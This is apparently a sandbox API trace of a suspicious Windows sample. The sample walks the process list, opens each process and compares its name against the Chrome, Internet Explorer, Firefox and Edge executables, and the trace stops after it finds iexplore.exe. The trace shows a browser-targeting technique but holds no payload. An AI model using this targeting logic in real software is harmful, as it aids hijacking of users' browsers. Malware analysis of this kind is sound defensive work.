	[0233.800] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.800] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.800] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0233.800] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.800] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.801] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0233.801] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x7184
	[0233.802] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.802] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0233.802] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.802] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.802] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.802] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0233.803] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.803] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.803] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0233.803] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x7188
	[0233.804] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.804] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0233.804] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.804] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.804] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.804] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0233.805] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.805] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.805] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0233.806] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x718c
	[0233.806] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.806] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0233.806] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.806] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.806] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.806] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0233.807] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.807] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.807] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0233.808] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x7190
	[0233.808] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.808] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0233.808] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.808] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.808] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.808] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0233.809] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.809] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.809] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0233.810] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x7194
	[0233.810] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.810] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0233.810] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.810] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.810] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.810] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0233.811] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.811] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.811] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0233.812] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x7198
	[0233.812] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.812] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0233.812] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.812] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.812] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.812] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0233.813] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.813] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.813] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0233.814] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x719c
	[0233.814] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.814] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0233.815] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.815] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.815] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.815] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0233.815] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.815] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.815] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0233.816] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x71a0
	[0233.816] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.816] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0233.817] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.817] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.817] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.817] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0233.817] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.817] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.817] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0233.818] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0233.818] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0233.819] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x71a4
	[0233.819] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.819] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0233.820] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.820] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.820] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.820] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0233.821] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.821] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.821] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0233.822] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x71a8
	[0233.822] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.822] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0233.822] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.822] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.823] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.823] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0233.823] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.823] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.823] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0233.824] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x71ac
	[0233.824] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.824] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0233.824] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.824] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.825] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.825] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0233.825] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.825] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.825] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0233.826] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x71b0
	[0233.826] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.826] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0233.826] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.826] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.827] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.827] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0233.827] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.827] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.827] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0233.828] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x71b4
	[0233.828] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.828] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0233.829] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.829] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.830] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.830] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0233.830] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.830] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.831] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0233.832] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x71b8
	[0233.832] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.832] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0233.832] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.832] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.832] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.832] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0233.833] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.833] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.833] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0233.833] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x71bc
	[0233.834] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.834] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0233.834] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.834] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.834] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.834] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0233.835] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.835] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.835] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0233.836] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x71c0
	[0233.836] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.836] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0233.836] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.837] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.837] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.837] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0233.837] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.837] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.838] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0233.838] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x71c4
	[0233.839] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.839] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0233.839] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.839] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.839] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.839] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0233.839] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.839] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.840] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0233.840] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x71c8
	[0233.840] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.840] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0233.841] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.841] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.841] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.841] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0233.841] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.841] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.841] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0233.842] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x71cc
	[0233.842] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.842] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0233.843] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.843] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.843] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.843] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0233.844] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.844] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.844] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0233.845] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x71d0
	[0233.845] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.845] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0233.846] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.846] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.847] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.847] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0233.847] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.847] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.848] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0233.848] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x71d4
	[0233.848] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.849] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0233.849] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.849] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.849] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.849] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0233.850] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.850] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.850] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0233.851] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x71d8
	[0233.851] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.851] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0233.852] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.852] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.852] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.852] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0233.853] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.853] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.854] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0233.854] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x71dc
	[0233.854] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.854] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0233.855] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.855] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.855] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.855] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0233.856] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.856] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.856] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0233.857] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x71e0
	[0233.857] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.857] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0233.857] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.857] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0233.857] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.857] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
